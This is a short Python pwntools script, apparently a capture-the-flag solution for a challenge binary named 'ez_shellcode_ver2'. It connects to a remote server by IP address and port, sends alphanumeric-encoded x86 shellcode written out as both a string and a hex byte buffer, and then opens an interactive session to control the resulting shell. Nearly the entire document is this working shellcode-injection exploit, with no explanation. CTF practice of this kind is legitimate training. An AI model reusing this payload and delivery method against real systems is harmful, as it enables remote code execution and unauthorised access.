from pwn import *

# context.log_level = 'debug'
r = remote('111.230.149.72', 10007)
# r = process("./ez_shellcode_ver2")
payload = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB" \
		"2BB0BBXP8ACJJI2JDKPXJ90R3VCX6M3SMYKWCXVO2SRHC0E86O3RRIBNK9JC1BZHUXEP30C0VOCRU9BN6OD3BHC0PW1CMYKQ8MMPAA"
buf  = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51"
buf += "\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41"
buf += "\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54"
buf += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
buf += "\x50\x38\x41\x43\x4a\x4a\x49\x53\x5a\x54\x4b\x50\x58"
buf += "\x4c\x59\x46\x32\x53\x56\x32\x48\x36\x4d\x45\x33\x4b"
buf += "\x39\x4b\x57\x32\x48\x46\x4f\x52\x53\x53\x58\x53\x30"
buf += "\x45\x38\x36\x4f\x42\x42\x33\x59\x42\x4e\x4c\x49\x4d"
buf += "\x33\x30\x52\x4b\x58\x33\x33\x35\x50\x33\x30\x35\x50"
buf += "\x53\x43\x32\x48\x53\x30\x51\x47\x50\x53\x4b\x39\x4d"
buf += "\x31\x58\x4d\x4d\x50\x41\x41"
# r.recvuntil(">")
r.sendline(buf)
r.interactive()
